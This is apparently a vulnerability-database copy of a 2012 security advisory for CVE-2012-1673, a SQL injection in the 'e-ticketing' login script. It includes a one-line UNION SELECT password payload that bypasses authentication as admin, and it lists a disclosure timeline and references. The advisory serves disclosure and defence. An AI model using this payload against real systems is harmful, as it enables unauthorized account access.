Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27898
HistoryApr 09, 2012 - 12:00 a.m.

'e-ticketing' SQL Injection (CVE-2012-1673)

2012-04-0900:00:00
vulners.com
28
JSON

'e-ticketing' SQL Injection (CVE-2012-1673)
Mark Stanislav - [email protected]

I. DESCRIPTION

A vulnerability exists in loginscript.php that allows for SQL
injection of the 'user_name' and 'password' POST parameters.

II. TESTED VERSION

Released on 2011-11-30 (no versioning used)

III. PoC EXPLOIT

POST a form to loginscript.php with the value of 'password' set to: '
UNION SELECT * from user where user_name = 'admin

IV. SOLUTION

Do not use this software, no patched version exists at this time.

V. REFERENCES

http://sourceforge.net/projects/e-ticketing/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1673

VI. TIMELINE

03/01/2012 - Initial vendor disclosure
03/03/2012 - Vendor response and commitment to fix
03/20/2012 - Follow-up e-mail to vendor as no patched version was published yet
04/04/2012 - Public disclosure

Related

exploitpack 1
prion 1
seebug 1
cve 1
packetstorm 1
exploitdb 1
securityvulns 1
exploitpack
exploitpack
e-ticketing - SQL Injection
2012-04-04 00:00:00
prion
prion
Sql injection
2012-04-11 10:39:00
seebug
seebug
e-ticketing - SQL Injection
2014-07-01 00:00:00
cve
cve
CVE-2012-1673
2012-04-11 10:39:00
packetstorm
packetstorm
e-ticketing SQL Injection
2012-04-04 00:00:00
exploitdb
exploitdb
e-ticketing - SQL Injection
2012-04-04 00:00:00
securityvulns
securityvulns
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2012-04-09 00:00:00
JSON
Related for SECURITYVULNS:DOC:27898
exploitpack1prion1seebug1cve1packetstorm1exploitdb1securityvulns1